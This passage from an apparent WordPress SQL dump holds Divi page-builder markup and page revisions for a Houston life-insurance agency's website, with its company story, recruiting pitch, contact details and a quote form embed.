_module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','CLASSROOM','','publish','closed','closed','','classroom','','','2023-04-03 23:00:12','2023-04-03 23:00:12','',0,'http://cmdev-site1.com/et_pb_layout/classroom/',0,'et_pb_layout','',0),(678,3,'2023-04-03 13:43:03','2023-04-03 13:43:03','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" custom_margin=\"-11px|||||\" custom_padding=\"364px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 13:43:03','2023-04-03 13:43:03','',26,'http://cmdev-site1.com/?p=678',0,'revision','',0),(680,3,'2023-04-03 14:32:55','2023-04-03 14:32:55','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 14:32:55','2023-04-03 14:32:55','',138,'http://cmdev-site1.com/?p=680',0,'revision','',0),(838,1,'2023-04-08 20:39:35','2023-04-08 20:39:35','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:39:35','2023-04-08 20:39:35','',138,'http://cmdev-site1.com/?p=838',0,'revision','',0),(780,3,'2023-04-04 12:59:16','2023-04-04 12:59:16','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" 